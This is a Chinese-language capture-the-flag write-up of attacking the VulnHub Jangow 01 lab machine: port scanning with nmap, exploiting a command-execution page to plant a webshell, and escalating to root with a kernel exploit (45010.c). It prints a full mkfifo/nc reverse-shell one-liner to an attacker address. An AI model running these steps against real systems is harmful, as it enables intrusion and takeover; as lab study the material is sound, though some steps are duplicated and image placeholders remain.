VulnHub-Jangow-01-1.0.1打靶记录
知识点
- NMAP参数
-sV
获取系统信息-sT
TCP扫描可能会留下日志记录-sC
使用默认脚本(在-A模式下不需要)-p1-xxx
扫描端口号-p-
==>等价于-p1-65535
不设置端口就扫描默认端口-Pn
绕过禁用ping-A
进攻性扫描也会运行默认脚本)
- arp-scan arp利用arp地址解析协议探测扫描
- -I 大写i 用以指定用来扫描的网卡 如果未指定会使用网卡序号最低的一个 也就是eth0但是如果指定 那么指定的网卡必须支持ARP
- -l 小写L 表示从网络接口的ip和掩码生成列表进行扫描
准备工作
由于下载的ova文件默认是仅主机模式,不方便使用,这里用vm打开后改为,nat模式,当然如果要使用仅主机模式,只要保持,可以和目标通信即可。
由于镜像保护原因,直接下载的可能遇到无法获得ip的情况,可通过一下步骤获取ip
- 在下面这个页面按e
-
找到这个位置 将ro更改为 rw single init=/bin/bash,如图所示
-
然后按ctr+x进入命令行页面
-
查看网卡名称
-
进入网络配置面板
-
将该文件的网卡名称改为 ens33
-
重启网卡即可获取ip
-
然后直接重启虚拟机即可进入测试
信息收集
- 目标发现
发现目标,由于其他三个是环境中的所以锁定这个(这里有点脱裤子放*了,因为前面重启服务的时候已经看到了,但是如果这个环境没有问题,是需要这样进行目标发现的。)
-
资产扫描
nmap -sV -Pn -A -p- 192.168.245.141
这里用-p-是全端口扫描,虽然慢点,但是这样可以保证资产不遗漏,如果靶机改了端口,用常用端口无法扫描到。
-
这里扫描发现有一个http服务,和ftp服务,ftp需要账号密码,转向http服务
-
http测试
- 点击site进入网站首页
- 翻看发现这个页面存在命令执行。
7. 只需要在参数后门加要执行的命令
-
webshell写入
注意那么美元符前面要加反斜杠,否则在执行的时候,命令行会把他当做一个变量,无法写入到文件
-
使用ls命令查看目标已写入成功,用蚁剑连接
-
这个文件中有数据库信息,本打算利用数据库提权,但是很遗憾无法连接,按理说用webshell连接是本地连接但是连接不上。
-
寻找其他的方法,本想将权限返回到msf或者cs上进行下一步自动发测试但是多种方式测试均无法成功上线,可能是防火墙原因也有可能是靶场的linux环境不支持我测试的后门程序。
-
这里使用命令
uname -a
可以发现 系统内核版本信息,使用searchsploit进行搜索,结果如下
-
经测试只有45010.c这个文件可以成功反弹,其他均失败
-
将shell反弹到nc,因为需要接收exp执行后返回的回话。
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.245.128 443 >/tmp/f
更换ip即可
nc -lvnp 443 端口不能换,其他端口没办法反弹。 -
执行 exp
./exp
如果执行不成功 添加执行权限chmod +x exp
后再执行
38195)]
17. 执行 exp ./exp
如果执行不成功 添加执行权限 chmod +x exp
后再执行
18. [外链图片转存中…(img-C4kFovwJ-1661052138195)]
获得了root权限,使用passwd即可更改密码,可以任意方法维持权限。